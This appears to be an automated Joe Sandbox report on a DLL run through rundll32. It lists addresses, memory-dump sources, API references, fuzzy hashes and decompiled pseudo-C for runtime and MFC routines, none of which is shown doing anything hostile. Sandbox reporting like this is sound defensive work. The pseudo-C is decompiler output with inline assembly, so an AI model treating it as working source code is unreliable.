                                                                        0x10039701
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039716
                                                                        0x10039718
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039723
                                                                        0x10039724
                                                                        0x10039725
                                                                        0x10039726
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100396ee
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039677
                                                                        0x10039639
                                                                        0x1003963c
                                                                        0x10039642
                                                                        0x10039646
                                                                        0x10039647
                                                                        0x00000000
                                                                        0x10039639
                                                                        0x100395e9
                                                                        0x100395f0
                                                                        0x100395f3
                                                                        0x100396b0
                                                                        0x100396b1
                                                                        0x100396b2
                                                                        0x100396b5
                                                                        0x100396ba
                                                                        0x100396c0
                                                                        0x00000000
                                                                        0x100396c0
                                                                        0x100395fc
                                                                        0x1003969b
                                                                        0x1003969c
                                                                        0x1003969d
                                                                        0x100396a0
                                                                        0x100396a5
                                                                        0x100396a8
                                                                        0x100396a8
                                                                        0x00000000
                                                                        0x100396a8
                                                                        0x10039605
                                                                        0x1003968c
                                                                        0x1003968d
                                                                        0x1003968e
                                                                        0x10039691
                                                                        0x10039696
                                                                        0x00000000
                                                                        0x10039696
                                                                        0x1003960e
                                                                        0x1003967e
                                                                        0x1003967f
                                                                        0x10039680
                                                                        0x10039688
                                                                        0x10039615
                                                                        0x10039615
                                                                        0x10039616
                                                                        0x10039617
                                                                        0x1003961f
                                                                        0x10039622
                                                                        0x10039622
                                                                        0x00000000
                                                                        0x1003960e
                                                                        0x00000000
                                                                        0x100395a8
                                                                        0x100394fc
                                                                        0x100394fc
                                                                        0x10039500
                                                                        0x10039507
                                                                        0x10039508
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039516
                                                                        0x1003951b
                                                                        0x1003951e
                                                                        0x10039525
                                                                        0x1003952a
                                                                        0x1003952e
                                                                        0x10039535
                                                                        0x10039538
                                                                        0x1003953c
                                                                        0x1003953c
                                                                        0x1003953d
                                                                        0x10039541
                                                                        0x10039542
                                                                        0x10039546
                                                                        0x10039549
                                                                        0x10039551
                                                                        0x00000000

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 100394B5
                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 100394E0
                                                                        • VariantClear.OLEAUT32(0000000C), ref: 1003963C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClearH_prologVariantlstrlen
                                                                        • String ID:
                                                                        • API String ID: 2416264355-0
                                                                        • Opcode ID: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                        • Instruction ID: 794d22016aebeea8945113baaba77667614d3c7e1eb394332e3a898872445e5b
                                                                        • Opcode Fuzzy Hash: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                        • Instruction Fuzzy Hash: 8381B13590465AEFCF12CFA9C881A9EBBB5FF05391F208115F854AF291D735EA90CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018BEF Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E10018BEF(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __ebp;
				intOrPtr* _t89;
				void* _t90;
				void* _t101;
				intOrPtr _t112;
				void* _t115;
				signed int _t120;
				signed int _t125;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t138;
				intOrPtr _t140;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t180;

				_t89 = _a4;
				_v12 = _v12 & 0x00000000;
				_t133 =  *((intOrPtr*)(_t89 + 4));
				_t162 =  *_t89;
				_v24 = _t162;
				_v20 = _t133;
				_t90 = E1001519D(_t162);
				_t174 = _t133;
				_t172 = _t90;
				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
					L28:
					return 0;
				} else {
					_t176 = _t133 - 0x1000;
					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
						goto L28;
					} else {
						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
							L9:
							_t173 =  *((intOrPtr*)(_t172 + 0x44));
							L10:
							_t142 = E10013780(_t162, _t133, 0x1e13380, 0) + 0x46;
							_t10 = _t142 + 0x12b; // 0xe5
							asm("cdq");
							_t15 = _t142 - 1; // -71
							_v16 = _t15;
							_v8 = _t142;
							asm("cdq");
							_t164 = 0x64;
							_t165 = 4;
							asm("cdq");
							_t28 = _v16 / _t165 - 0x11; // 0xd4
							asm("cdq");
							_t29 = _t142 - 0x46; // -140
							asm("cdq");
							_t101 = E100122A0(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
							asm("sbb edx, ebx");
							_t138 = 0x15180;
							_t168 = _v24 + E100122A0(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
							asm("adc [ebp-0x10], edx");
							_t180 = _v20;
							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
								asm("cdq");
								_t143 = 4;
								if(_v8 % _t143 != 0) {
									L19:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										goto L21;
									}
									goto L20;
								}
								asm("cdq");
								_t149 = 0x64;
								_t158 = _v8 % _t149;
								if(_v8 % _t149 != 0) {
									goto L20;
								}
								goto L19;
							} else {
								_t125 = _v16;
								_v8 = _t125;
								_t168 = _t168 + 0x1e13380;
								asm("adc dword [ebp-0x10], 0x0");
								asm("cdq");
								_t150 = 4;
								if(_t125 % _t150 != 0) {
									L15:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										L21:
										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
										 *((intOrPtr*)(_t173 + 0x1c)) = E10013780(_t168, _v20, _t138, 0);
										asm("cdq");
										_t169 = _t168 + E100122A0(_t110, _t158, 0xfffeae80, 0xffffffff);
										asm("adc [ebp-0x10], edx");
										_t159 = 0x1004ce98;
										if(_v12 == 0) {
											_t159 = 0x1004cecc;
										}
										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
										_t146 = 1;
										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
											L27:
											_t147 = _t146 - 1;
											 *(_t173 + 0x10) = _t147;
											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
											_t115 = E10013780( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
											_t148 = 7;
											asm("cdq");
											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
											 *((intOrPtr*)(_t173 + 8)) = E10013780(_t169, _v20, 0xe10, 0);
											asm("cdq");
											_t170 = _t169 + E100122A0(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
											asm("adc [ebp-0x10], edx");
											_t120 = E10013780(_t170, _v20, 0x3c, 0);
											 *(_t173 + 4) = _t120;
											 *_t173 = _t170 - _t120 * 0x3c;
											 *((intOrPtr*)(_t173 + 0x20)) = 0;
											return _t173;
										} else {
											_t140 = _t112;
											do {
												_t146 = _t146 + 1;
											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
											_t138 = 0x15180;
											goto L27;
										}
									}
									L16:
									_t168 = _t168 + _t138;
									asm("adc dword [ebp-0x10], 0x0");
									L20:
									_v12 = 1;
									goto L21;
								}
								asm("cdq");
								_t152 = 0x64;
								_t158 = _v8 % _t152;
								if(_v8 % _t152 != 0) {
									goto L16;
								}
								goto L15;
							}
						}
						_t132 = E100107B6(0x24);
						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
						if(_t132 != 0) {
							goto L9;
						}
						_t173 = 0x1004f744;
						goto L10;
					}
				}
			}









































                                                                        0x10018bf5
                                                                        0x10018bf8
                                                                        0x10018bfd
                                                                        0x10018c02
                                                                        0x10018c04
                                                                        0x10018c07
                                                                        0x10018c0a
                                                                        0x10018c0f
                                                                        0x10018c11
                                                                        0x10018c13
                                                                        0x10018e0d
                                                                        0x00000000
                                                                        0x10018c23
                                                                        0x10018c23
                                                                        0x10018c29
                                                                        0x00000000
                                                                        0x10018c39
                                                                        0x10018c3d
                                                                        0x10018c55
                                                                        0x10018c55
                                                                        0x10018c58
                                                                        0x10018c68
                                                                        0x10018c6b
                                                                        0x10018c71
                                                                        0x10018c7b
                                                                        0x10018c7e
                                                                        0x10018c81
                                                                        0x10018c88
                                                                        0x10018c89
                                                                        0x10018c8e
                                                                        0x10018c9b
                                                                        0x10018c9e
                                                                        0x10018ca2
                                                                        0x10018ca5
                                                                        0x10018caa
                                                                        0x10018cad
                                                                        0x10018cb4
                                                                        0x10018cb8
                                                                        0x10018cc8
                                                                        0x10018cca
                                                                        0x10018ccd
                                                                        0x10018cd1
                                                                        0x10018d21
                                                                        0x10018d22
                                                                        0x10018d27
                                                                        0x10018d36
                                                                        0x10018d3e
                                                                        0x10018d44
                                                                        0x10018d48
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018d48
                                                                        0x10018d2e
                                                                        0x10018d2f
                                                                        0x10018d30
                                                                        0x10018d34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018cd9
                                                                        0x10018cd9
                                                                        0x10018cdc
                                                                        0x10018cdf
                                                                        0x10018ce5
                                                                        0x10018ceb
                                                                        0x10018cec
                                                                        0x10018cf1
                                                                        0x10018d00
                                                                        0x10018d08
                                                                        0x10018d0e
                                                                        0x10018d12
                                                                        0x10018d51
                                                                        0x10018d5a
                                                                        0x10018d65
                                                                        0x10018d68
                                                                        0x10018d75
                                                                        0x10018d77
                                                                        0x10018d7e
                                                                        0x10018d83
                                                                        0x10018d85
                                                                        0x10018d85
                                                                        0x10018d8a
                                                                        0x10018d8f
                                                                        0x10018d93
                                                                        0x10018da2
                                                                        0x10018da2
                                                                        0x10018da3
                                                                        0x10018dab
                                                                        0x10018db7
                                                                        0x10018dc1
                                                                        0x10018dc2
                                                                        0x10018dd1
                                                                        0x10018ddb
                                                                        0x10018dde
                                                                        0x10018dec
                                                                        0x10018dee
                                                                        0x10018df7
                                                                        0x10018dfc
                                                                        0x10018e04
                                                                        0x10018e06
                                                                        0x00000000
                                                                        0x10018d95
                                                                        0x10018d95
                                                                        0x10018d97
                                                                        0x10018d97
                                                                        0x10018d98
                                                                        0x10018d9d
                                                                        0x00000000
                                                                        0x10018d9d
                                                                        0x10018d93
                                                                        0x10018d14
                                                                        0x10018d14
                                                                        0x10018d16
                                                                        0x10018d4a
                                                                        0x10018d4a
                                                                        0x00000000
                                                                        0x10018d4a
                                                                        0x10018cf8
                                                                        0x10018cf9
                                                                        0x10018cfa
                                                                        0x10018cfe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018cfe
                                                                        0x10018cd1
                                                                        0x10018c41
                                                                        0x10018c49
                                                                        0x10018c4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018c4e
                                                                        0x00000000
                                                                        0x10018c4e
                                                                        0x10018c29

                                                                        APIs
                                                                          • Part of subcall function 1001519D: GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                          • Part of subcall function 1001519D: FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                          • Part of subcall function 1001519D: FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                          • Part of subcall function 1001519D: GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                          • Part of subcall function 1001519D: SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018D5E
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DB7
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DD4
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DF7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                        • String ID:
                                                                        • API String ID: 223281555-0
                                                                        • Opcode ID: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                        • Instruction ID: 428b4c813f629567aa63a678bca7b6061bdb39fa1b2836493da5e96e2c7cad82
                                                                        • Opcode Fuzzy Hash: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                        • Instruction Fuzzy Hash: 3361B1B6A00306ABD714DEA9CC41BAEB3F6EB84354F25452DF5119B2C1D7B5EB808B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002D821 Relevance: 7.7, APIs: 5, Instructions: 204windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E1002D821(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				signed char _t75;
				signed int _t80;
				signed int _t81;
				signed int _t85;
				signed int _t87;
				void* _t95;
				intOrPtr _t125;
				intOrPtr _t133;
				void* _t147;
				void* _t151;
				intOrPtr _t155;
				void* _t158;
				void* _t160;

				_t147 = __edx;
				_t158 = _t160 - 0xb0;
				_t70 =  *0x1004c470; // 0x1bfbe703
				_t155 =  *((intOrPtr*)(_t158 + 0xb8));
				 *((intOrPtr*)(_t158 + 0xac)) = _t70;
				_t125 = __ecx;
				_t72 = GetWindowRect( *(_t155 + 0x1c), _t158 - 0x80);
				if( *((intOrPtr*)(_t155 + 0x88)) != _t125 ||  *(_t158 + 0xbc) != 0 && EqualRect(_t158 - 0x80,  *(_t158 + 0xbc)) == 0) {
					if( *((intOrPtr*)(_t125 + 0x90)) != 0 && ( *(_t155 + 0x80) & 0x00000040) != 0) {
						 *(_t125 + 0x7c) =  *(_t125 + 0x7c) | 0x00000040;
					}
					 *(_t125 + 0x7c) =  *(_t125 + 0x7c) & 0xfffffff9;
					_t75 =  *(_t155 + 0x7c) & 0x00000006 |  *(_t125 + 0x7c);
					 *(_t125 + 0x7c) = _t75;
					if((_t75 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t158 - 0x58);
						E1002095F(_t155);
						E10029B23(_t155,  *((intOrPtr*)(_t125 + 0x1c)), _t158 - 0x58);
					}
					_t80 = ( *(_t155 + 0x7c) ^  *(_t125 + 0x7c)) & 0x0000f000 ^  *(_t155 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t125 + 0x90)) == 0) {
						_t81 = _t80 & 0xfffffffe;
					} else {
						_t81 = _t80 | 0x00000001;
					}
					E100383D0(_t155, _t81);
					 *((intOrPtr*)(_t158 - 0x6c)) = 0;
					if( *((intOrPtr*)(_t155 + 0x88)) != _t125 && IsWindowVisible( *(_t155 + 0x1c)) != 0) {
						E100204FE(_t155, 0, 0, 0, 0, 0, 0x97);
						 *((intOrPtr*)(_t158 - 0x6c)) = 1;
					}
					 *(_t158 - 0x70) =  *(_t158 - 0x70) | 0xffffffff;
					if( *(_t158 + 0xbc) == 0) {
						_t57 = _t125 + 0x94; // 0x94
						_t150 = _t57;
						E1001E2BE(_t57, _t158,  *((intOrPtr*)(_t57 + 8)), _t155);
						E1001E2BE(_t150, _t158,  *((intOrPtr*)(_t150 + 8)), 0);
						_t85 =  *0x1004efa4; // 0x2
						_t151 = 0;
						_t87 =  *0x1004efa0; // 0x2
						E100204FE(_t155, 0,  ~_t87,  ~_t85, 0, 0, 0x115);
					} else {
						CopyRect(_t158 - 0x68,  *(_t158 + 0xbc));
						E10028E5A(_t125, _t158 - 0x68);
						asm("cdq");
						asm("cdq");
						_push(( *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)) - _t147 >> 1) +  *((intOrPtr*)(_t158 - 0x64)));
						_push(( *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68) - _t147 >> 1) +  *(_t158 - 0x68));
						_push( *((intOrPtr*)(_t158 + 0xb8)));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t158 - 0x70) = E1002CE2A(_t125);
						E100204FE( *((intOrPtr*)(_t158 + 0xb8)), 0,  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x64)),  *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)), 0x114);
						_t155 =  *((intOrPtr*)(_t158 + 0xb8));
						_t151 = 0;
					}
					if(E100220EE(_t158, GetParent( *(_t155 + 0x1c))) != _t125) {
						E1000870E(_t155, _t125);
					}
					_t133 =  *((intOrPtr*)(_t155 + 0x88));
					if(_t133 != _t125) {
						if(_t133 != _t151) {
							if( *((intOrPtr*)(_t125 + 0x90)) == _t151 ||  *((intOrPtr*)(_t133 + 0x90)) != _t151) {
								_t95 = 0;
							} else {
								_t95 = 1;
							}
							_push(_t95);
							_push(0xffffffff);
							goto L27;
						}
					} else {
						_push(_t151);
						_push( *(_t158 - 0x70));
						L27:
						_push(_t155);
						E1002D1B2(_t133);
					}
					 *((intOrPtr*)(_t155 + 0x88)) = _t125;
					if( *((intOrPtr*)(_t158 - 0x6c)) != _t151) {
						E100204FE(_t155, _t151, _t151, _t151, _t151, _t151, 0x57);
					}
					E1002D14B(_t125, _t125, _t158, _t155);
					 *(E100314D8(_t125) + 0xcc) =  *(_t72 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t72,  *((intOrPtr*)(_t158 + 0xac)));
			}




















                                                                        0x1002d821
                                                                        0x1002d822
                                                                        0x1002d82f
                                                                        0x1002d836
                                                                        0x1002d83c
                                                                        0x1002d84a
                                                                        0x1002d84c
                                                                        0x1002d85a
                                                                        0x1002d886
                                                                        0x1002d891
                                                                        0x1002d891
                                                                        0x1002d895
                                                                        0x1002d8a2
                                                                        0x1002d8a6
                                                                        0x1002d8a9
                                                                        0x1002d8ab
                                                                        0x1002d8b3
                                                                        0x1002d8b6
                                                                        0x1002d8c2
                                                                        0x1002d8c2
                                                                        0x1002d8d5
                                                                        0x1002d8e0
                                                                        0x1002d8e7
                                                                        0x1002d8e2
                                                                        0x1002d8e2
                                                                        0x1002d8e2
                                                                        0x1002d8ed
                                                                        0x1002d8f8
                                                                        0x1002d8fb
                                                                        0x1002d916
                                                                        0x1002d91b
                                                                        0x1002d91b
                                                                        0x1002d922
                                                                        0x1002d92c
                                                                        0x1002d9b9
                                                                        0x1002d9b9
                                                                        0x1002d9c5
                                                                        0x1002d9d1
                                                                        0x1002d9d6
                                                                        0x1002d9e0
                                                                        0x1002d9e7
                                                                        0x1002d9f2
                                                                        0x1002d932
                                                                        0x1002d93c
                                                                        0x1002d948
                                                                        0x1002d956
                                                                        0x1002d966
                                                                        0x1002d96e
                                                                        0x1002d96f
                                                                        0x1002d975
                                                                        0x1002d97b
                                                                        0x1002d97c
                                                                        0x1002d97d
                                                                        0x1002d980
                                                                        0x1002d98c
                                                                        0x1002d9aa
                                                                        0x1002d9af
                                                                        0x1002d9b5
                                                                        0x1002d9b5
                                                                        0x1002da08
                                                                        0x1002da0d
                                                                        0x1002da0d
                                                                        0x1002da12
                                                                        0x1002da1a
                                                                        0x1002da24
                                                                        0x1002da2c
                                                                        0x1002da3b
                                                                        0x1002da36
                                                                        0x1002da38
                                                                        0x1002da38
                                                                        0x1002da3d
                                                                        0x1002da3e
                                                                        0x00000000
                                                                        0x1002da3e
                                                                        0x1002da1c
                                                                        0x1002da1c
                                                                        0x1002da1d
                                                                        0x1002da40
                                                                        0x1002da40
                                                                        0x1002da41
                                                                        0x1002da41
                                                                        0x1002da49
                                                                        0x1002da4f
                                                                        0x1002da5a
                                                                        0x1002da5a
                                                                        0x1002da62
                                                                        0x1002da6e
                                                                        0x1002da6e
                                                                        0x1002da8a

                                                                        APIs
                                                                        • GetWindowRect.USER32 ref: 1002D84C
                                                                        • EqualRect.USER32 ref: 1002D872
                                                                        • IsWindowVisible.USER32 ref: 1002D900
                                                                        • CopyRect.USER32 ref: 1002D93C
                                                                        • GetParent.USER32(?), ref: 1002D9FA
                                                                          • Part of subcall function 1000870E: SetParent.USER32(?,00000000), ref: 1000871D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$ParentWindow$CopyEqualVisible
                                                                        • String ID:
                                                                        • API String ID: 545338366-0
                                                                        • Opcode ID: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                        • Instruction ID: 33a625b915a49ab54241972194f75ebdbdf7b4231d1b3c0eb1f8f86e0de30ee8
                                                                        • Opcode Fuzzy Hash: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                        • Instruction Fuzzy Hash: 86619A71600649AFDB61EFA8DC85FAE77FAEB44300F50812AE959DB196CB30AC45CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10014691 Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10014691(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x1004f590; // 0x0
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x1004f5d8, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x1004f590; // 0x0
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x1004f5d8, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x1004f590 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x1004f598 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x1004f594 + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
